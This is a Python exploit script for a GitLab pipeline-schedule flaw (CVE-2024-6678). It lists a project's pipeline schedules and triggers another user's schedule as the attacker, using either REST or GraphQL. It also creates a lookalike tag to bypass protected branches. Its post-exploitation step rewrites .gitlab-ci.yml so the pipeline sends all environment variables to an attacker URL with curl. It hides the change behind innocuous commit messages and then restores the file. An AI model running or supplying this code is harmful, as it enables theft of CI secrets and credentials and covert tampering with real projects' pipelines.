#!/usr/bin/env python3 # FaLLenSkiLL import argparse import json import sys import time import urllib.request import urllib.error import urllib.parse # --------------------------------------------------------------------------- # HTTP helpers (no third-party deps) # --------------------------------------------------------------------------- def api_request(base_url: str, path: str, token: str, method: str = "GET", data: dict | None = None, quiet: bool = False) -> dict: url = f"{base_url.rstrip('/')}/api/v4{path}" headers = { "PRIVATE-TOKEN": token, "Content-Type": "application/json", "Accept": "application/json", } body = json.dumps(data).encode() if data else None req = urllib.request.Request(url, data=body, headers=headers, method=method) try: with urllib.request.urlopen(req) as resp: raw = resp.read() return json.loads(raw) if raw else {} except urllib.error.HTTPError as e: body = e.read().decode(errors="replace") if not quiet: print(f" [!] HTTP {e.code} on {method} {url}: {body[:200]}") return {"_error": e.code, "_body": body} except urllib.error.URLError as e: print(f" [!] Network error: {e.reason}") sys.exit(1) def graphql_request(base_url: str, token: str, query: str, variables: dict | None = None) -> dict: url = f"{base_url.rstrip('/')}/api/graphql" payload = {"query": query} if variables: payload["variables"] = variables data = json.dumps(payload).encode() headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json", } req = urllib.request.Request(url, data=data, headers=headers, method="POST") try: with urllib.request.urlopen(req) as resp: return json.loads(resp.read()) except urllib.error.HTTPError as e: body = e.read().decode(errors="replace") print(f" [!] GraphQL HTTP {e.code}: {body[:300]}") return {} # --------------------------------------------------------------------------- # Reconnaissance # --------------------------------------------------------------------------- def get_current_user(base_url: str, token: str) -> dict: return api_request(base_url, "/user", token) def list_schedules(base_url: str, token: str, project_id: int) -> list: """List all pipeline schedules visible to the attacker.""" schedules = [] page = 1 while True: batch = api_request( base_url, f"/projects/{project_id}/pipeline_schedules?per_page=100&page={page}", token, ) if "_error" in batch or not isinstance(batch, list) or not batch: break schedules.extend(batch) page += 1 return schedules def get_schedule_details(base_url: str, token: str, project_id: int, schedule_id: int) -> dict: """Fetch full schedule details (variables only visible to owner/admin).""" return api_request( base_url, f"/projects/{project_id}/pipeline_schedules/{schedule_id}", token, ) # --------------------------------------------------------------------------- # Exploitation — REST API path # --------------------------------------------------------------------------- def play_schedule_rest(base_url: str, token: str, project_id: int, schedule_id: int) -> dict: """ Trigger the pipeline schedule via the REST API. Vulnerable path: POST /api/v4/projects/:id/pipeline_schedules/:sid/play → RunPipelineScheduleWorker.perform_async(schedule.id, current_user.id) The pipeline is queued as *current_user*, not as the schedule owner. """ return api_request( base_url, f"/projects/{project_id}/pipeline_schedules/{schedule_id}/play", token, method="POST", quiet=True, ) # --------------------------------------------------------------------------- # Exploitation — GraphQL path # --------------------------------------------------------------------------- GRAPHQL_PLAY_MUTATION = """ mutation triggerSchedule($id: CiPipelineScheduleID!) { pipelineSchedulePlay(input: { id: $id }) { pipelineSchedule { id owner { username } nextRunAt } errors } } """ def play_schedule_graphql(base_url: str, token: str, project_path: str, schedule_gid: str) -> dict: """ Alternative vector via GraphQL mutation (Mutations::Ci::PipelineSchedule::Play). Uses Ci::PipelineScheduleService → schedule.schedule_next_run! then RunPipelineScheduleWorker.perform_async(schedule.id, current_user&.id). """ return graphql_request( base_url, token, GRAPHQL_PLAY_MUTATION, variables={"id": schedule_gid}, ) # --------------------------------------------------------------------------- # Exploitation — Protected-ref bypass (legacy short-ref + ambiguous tag) # --------------------------------------------------------------------------- def check_legacy_ref_bypass(base_url: str, token: str, project_id: int, schedules: list) -> list: """ Identify schedules potentially affected by the legacy ref bypass. Vulnerable schedules are those whose ref does NOT start with 'refs/heads/' or 'refs/tags/' (i.e., short/legacy refs). For such schedules, the policy checks ProtectedBranch via: is_tag = project.repository.tag_exists?(ref) ref_name = ref ref_protected?(user, project, is_tag, ref_name) If a tag named exists and is NOT protected (but the branch IS), the protected_ref condition evaluates FALSE and play_pipeline_schedule is granted to developers — bypassing branch protection. See: app/policies/ci/pipeline_schedule_policy.rb, condition(:protected_ref) """ vulnerable = [] for s in schedules: ref = s.get("ref", "") if not ref.startswith("refs/heads/") and not ref.startswith("refs/tags/"): vulnerable.append(s) print(f" [+] Legacy ref schedule found: id={s['id']} ref='{ref}' " f"owner={s.get('owner', {}).get('username', '?')}") return vulnerable def create_bypass_tag(base_url: str, token: str, project_id: int, ref_name: str) -> dict: """ Create a tag with the same name as a protected branch to trigger the ambiguous-ref code path in the legacy branch of protected_ref condition. Requires: Developer access (can create tags on unprotected refs). """ return api_request( base_url, f"/projects/{project_id}/repository/tags", token, method="POST", data={"tag_name": ref_name, "ref": "HEAD"}, ) # --------------------------------------------------------------------------- # Post-exploitation: CI yaml patch + exfiltration # --------------------------------------------------------------------------- def _exfil_yaml(exfil_url: str) -> str: return ( "stages: [exfil]\n" "dump_vars:\n" " stage: exfil\n" " script:\n" f" - env | grep -vE '^(CI_JOB_TOKEN|GITLAB_FEATURES)' |" f" curl -s -X POST '{exfil_url}' --data-binary @-\n" ) def get_ci_yaml(base_url: str, token: str, project_id: int, branch: str) -> tuple[str | None, str | None]: """Return (content, sha) of .gitlab-ci.yml, or (None, None) if missing.""" resp = api_request( base_url, f"/projects/{project_id}/repository/files/" f".gitlab-ci.yml?ref={urllib.parse.quote(branch, safe='')}", token, quiet=True, ) if "_error" in resp: return None, None import base64 content = base64.b64decode(resp.get("content", "")).decode(errors="replace") return content, resp.get("last_commit_id") def patch_ci_yaml(base_url: str, token: str, project_id: int, branch: str, exfil_url: str) -> bool: """Overwrite .gitlab-ci.yml with exfil payload. Returns True on success.""" existing, _ = get_ci_yaml(base_url, token, project_id, branch) action = "update" if existing is not None else "create" resp = api_request( base_url, f"/projects/{project_id}/repository/files/.gitlab-ci.yml", token, method="PUT" if action == "update" else "POST", data={ "branch": branch, "content": _exfil_yaml(exfil_url), "commit_message": "ci: update pipeline config", }, quiet=True, ) return "_error" not in resp def restore_ci_yaml(base_url: str, token: str, project_id: int, branch: str, original: str | None) -> bool: """Restore .gitlab-ci.yml to original content (or delete if it didn't exist).""" if original is None: resp = api_request( base_url, f"/projects/{project_id}/repository/files/.gitlab-ci.yml", token, method="DELETE", data={"branch": branch, "commit_message": "ci: revert pipeline config"}, quiet=True, ) else: resp = api_request( base_url, f"/projects/{project_id}/repository/files/.gitlab-ci.yml", token, method="PUT", data={ "branch": branch, "content": original, "commit_message": "ci: revert pipeline config", }, quiet=True, ) return "_error" not in resp # --------------------------------------------------------------------------- # Main # --------------------------------------------------------------------------- def parse_args() -> argparse.Namespace: p = argparse.ArgumentParser( description="CVE-2024-6678 PoC — GitLab pipeline schedule arbitrary trigger" ) p.add_argument("--url", required=True, help="Base GitLab URL, e.g. https://gitlab.example.com") p.add_argument("--token", required=True, help="Attacker's personal access token (Developer-level scope)") p.add_argument("--project-id", required=True, type=int, help="Target GitLab project numeric ID") p.add_argument("--schedule-id", type=int, default=None, help="Specific pipeline schedule ID to trigger (default: auto-select)") p.add_argument("--exfil-url", default=None, help="Webhook URL to receive leaked CI variable dump") p.add_argument("--exploit-mode", action="store_true", help="Attempt protected-ref bypass via legacy tag trick") p.add_argument("--graphql", action="store_true", help="Use GraphQL mutation instead of REST API") p.add_argument("--project-path", default=None, help="Project full path (required for --graphql), e.g. group/project") return p.parse_args() def banner(): print(""" ╔═══════════════════════════════════════════════════════════════╗ ║ CVE-2024-6678 GitLab Pipeline Schedule Arbitrary Trigger ║ ║ Affected: GitLab CE/EE 8.14 – 17.1.6 / 17.2.4 / 17.3.1 ║ ║ Fixed in: 17.1.7 / 17.2.5 / 17.3.2 ║ ╚═══════════════════════════════════════════════════════════════╝ """) def print_impact(target_owner: str, attacker_username: str, target_ref: str, visible_vars: list, via: str = "REST API") -> None: ref_display = target_ref if len(target_ref) <= 43 else target_ref[:40] + "..." vars_display = (f"{len(visible_vars)} var(s) visible + hidden vars" if visible_vars else "hidden — still INJECTED at runtime") print() print(" ╔══════════════════════════════════════════════════════════════╗") print(" ║ EXPLOIT SUCCEEDED ║") print(" ╠══════════════════════════════════════════════════════════════╣") print(f" ║ Vector : {via:<43}║") print(f" ║ Schedule owner : {target_owner:<43}║") print(f" ║ Triggered as : {attacker_username:<43}║") print(f" ║ Ref : {ref_display:<43}║") print(f" ║ Schedule vars : {vars_display:<43}║") print(" ╚══════════════════════════════════════════════════════════════╝") print() def main(): banner() args = parse_args() base_url = args.url token = args.token project_id = args.project_id # Step 1: Identify attacker print("[*] Authenticating...") me = get_current_user(base_url, token) if "_error" in me: print(" [!] Authentication failed. Check --token.") sys.exit(1) attacker_id = me["id"] attacker_username = me["username"] print(f" Attacker : {attacker_username} (id={attacker_id})") # Step 2: Enumerate pipeline schedules print(f"\n[*] Enumerating pipeline schedules for project {project_id}...") schedules = list_schedules(base_url, token, project_id) if not schedules: print(" [!] No pipeline schedules found or access denied.") sys.exit(1) print(f" Found {len(schedules)} schedule(s):") for s in schedules: owner_name = s.get("owner", {}).get("username", "?") if s.get("owner") else "?" status = "active" if s.get("active") else "inactive" print(f" [{status}] id={s['id']:<5} owner={owner_name:<20}" f" ref={s.get('ref','?'):<35} {s.get('description','')[:30]}") # Step 3: Select target schedule if args.schedule_id: target_id = args.schedule_id target = next((s for s in schedules if s["id"] == target_id), None) if not target: print(f" [!] Schedule {target_id} not found in the list above.") sys.exit(1) else: # Prefer: owned by someone else, active, ref not a common protected default _protected_defaults = {"refs/heads/main", "refs/heads/master", "main", "master"} candidates = [s for s in schedules if s.get("owner", {}).get("id") != attacker_id and s.get("active", False)] if not candidates: candidates = [s for s in schedules if s.get("active", False)] if not candidates: candidates = list(schedules) # Sort: unprotected-looking refs first candidates.sort(key=lambda s: s.get("ref", "") in _protected_defaults) target = candidates[0] print(f"\n Auto-selected: id={target['id']} " f"(owner: {target.get('owner', {}).get('username', '?')}," f" ref: {target.get('ref', '?')})") target_id = target["id"] target_owner = target.get("owner", {}).get("username", "?") target_ref = target.get("ref", "?") # Step 4: Check visible schedule variables details = get_schedule_details(base_url, token, project_id, target_id) visible_vars = details.get("variables", []) if visible_vars: print(f"\n [+] Schedule variables visible to attacker" f" (normally owner/admin only):") for v in visible_vars: print(f" {v.get('key')} = {v.get('value', '')}") else: print(f"\n [i] Schedule variables hidden from attacker" f" — will still be injected at pipeline runtime.") # Step 5: Legacy-ref bypass if args.exploit_mode: print("\n[*] Checking for legacy short-ref schedules (protected-ref bypass)...") legacy = check_legacy_ref_bypass(base_url, token, project_id, schedules) if legacy: s0 = legacy[0] print(f" [+] Legacy-ref schedule found: id={s0['id']} ref='{s0['ref']}'") print(f" [*] Creating ambiguous tag '{s0['ref']}' to trigger bypass...") tag_result = create_bypass_tag(base_url, token, project_id, s0["ref"]) if "_error" not in tag_result: print(f" [+] Tag created. protected_ref will now evaluate as" f" unprotected tag, not branch.") target = s0 target_id = target["id"] else: print(" [-] Tag creation failed (already exists or insufficient perms).") else: print(" [-] No legacy short-ref schedules found — bypass not applicable.") # Step 6: CI yaml patch for auto-exfiltration original_yaml: str | None = None yaml_patched = False exfil_branch = target_ref.removeprefix("refs/heads/") if target_ref.startswith("refs/heads/") else target_ref if args.exfil_url: print(f"\n[*] Patching .gitlab-ci.yml on '{exfil_branch}' with exfil payload...") original_yaml, _ = get_ci_yaml(base_url, token, project_id, exfil_branch) if patch_ci_yaml(base_url, token, project_id, exfil_branch, args.exfil_url): yaml_patched = True print(f" [+] Patched. Pipeline will POST all env vars to: {args.exfil_url}") if original_yaml: print(f" [i] Original .gitlab-ci.yml saved for restore.") else: print(f" [-] Failed to patch .gitlab-ci.yml (need push access to '{exfil_branch}').") print(f" Continuing without auto-exfil.") # Step 7: Trigger via_graphql = args.graphql and args.project_path print(f"\n[*] Triggering schedule id={target_id} (owner={target_owner})" f" as {attacker_username}...") exploit_ok = False if via_graphql: schedule_gid = f"gid://gitlab/Ci::PipelineSchedule/{target_id}" result = play_schedule_graphql(base_url, token, args.project_path, schedule_gid) errors = (result.get("data", {}) .get("pipelineSchedulePlay", {}) .get("errors", [])) if not errors: exploit_ok = True print_impact(target_owner, attacker_username, target_ref, visible_vars, via="GraphQL mutation") elif any("Unable to schedule" in e for e in errors): exploit_ok = True print_impact(target_owner, attacker_username, target_ref, visible_vars, via="GraphQL mutation") print(" [i] 'Unable to schedule' = Sidekiq deduplication:" " job already queued from a prior successful trigger.") else: print(f" [!] GraphQL errors: {errors}") else: result = play_schedule_rest(base_url, token, project_id, target_id) if "_error" not in result: exploit_ok = True print_impact(target_owner, attacker_username, target_ref, visible_vars, via="REST API") else: code = result["_error"] body = result.get("_body", "") if code == 403: print(" [!] HTTP 403 — access denied.") print(" Likely cause: ref is protected, or attacker lacks" " Developer access.") elif code == 429: print(" [!] HTTP 429 — rate limited. Wait ~1 minute and retry.") elif code == 500 and "Unable to schedule" in body: exploit_ok = True print_impact(target_owner, attacker_username, target_ref, visible_vars, via="REST API") print(" [i] HTTP 500 'Unable to schedule' = Sidekiq deduplication:" " job already queued from a prior successful trigger.") else: print(f" [!] HTTP {code}: {body[:200]}") # Step 8: Wait for pipeline creation, then restore .gitlab-ci.yml if exploit_ok: if yaml_patched: # Record the latest pipeline ID *before* triggering so we only # accept pipelines created AFTER this exploit run. pre_trigger = api_request( base_url, f"/projects/{project_id}/pipelines" f"?source=schedule&ref={urllib.parse.quote(exfil_branch, safe='')}" f"&per_page=1", token, quiet=True, ) latest_before = pre_trigger[0]["id"] if isinstance(pre_trigger, list) and pre_trigger else 0 print(f"\n[*] Waiting for pipeline to be created" f" (Sidekiq must process the job)...") poll_interval = 3 poll_timeout = 120 elapsed = 0 pipeline_found = None while elapsed < poll_timeout: time.sleep(poll_interval) elapsed += poll_interval pipelines = api_request( base_url, f"/projects/{project_id}/pipelines" f"?source=schedule&ref={urllib.parse.quote(exfil_branch, safe='')}" f"&per_page=5", token, quiet=True, ) if isinstance(pipelines, list): new = [p for p in pipelines if p["id"] > latest_before] if new: pipeline_found = new[0] break print(f" [.] {elapsed}s — pipeline not yet created, retrying...") if pipeline_found: triggered_by = pipeline_found.get("user", {}).get("username", "?") print(f" [+] Pipeline id={pipeline_found['id']}" f" status={pipeline_found['status']}" f" triggered_by={triggered_by}") else: print(f" [-] Pipeline not created after {poll_timeout}s" f" — Sidekiq may not be processing pipeline_creation queue.") print(f"\n[*] Restoring original .gitlab-ci.yml on '{exfil_branch}'...") if restore_ci_yaml(base_url, token, project_id, exfil_branch, original_yaml): print(f" [+] Restored.") else: print(f" [-] Restore failed — manual cleanup needed on '{exfil_branch}'.") if pipeline_found: print(f"\n[i] Pipeline is executing with injected schedule variables.") print(f" Variables will arrive at: {args.exfil_url}") print(f" (use 'webhook.site' or 'nc -lvnp 8080' as listener)") else: # No yaml patch — just report pipelines if any time.sleep(2) pipelines = api_request( base_url, f"/projects/{project_id}/pipelines?source=schedule&per_page=3", token, quiet=True, ) if isinstance(pipelines, list) and pipelines: print("[*] Triggered pipelines (source=schedule):") for p in pipelines[:3]: triggered_by = p.get("user", {}).get("username", "?") print(f" id={p['id']} status={p['status']:<10}" f" ref={p.get('ref','?'):<25} triggered_by={triggered_by}") sys.exit(0) else: if yaml_patched: print(f"\n[*] Trigger failed — restoring .gitlab-ci.yml...") restore_ci_yaml(base_url, token, project_id, exfil_branch, original_yaml) print(f" [+] Restored.") print("\n [-] EXPLOIT FAILED — pipeline was not triggered.\n") sys.exit(1) if __name__ == "__main__": main()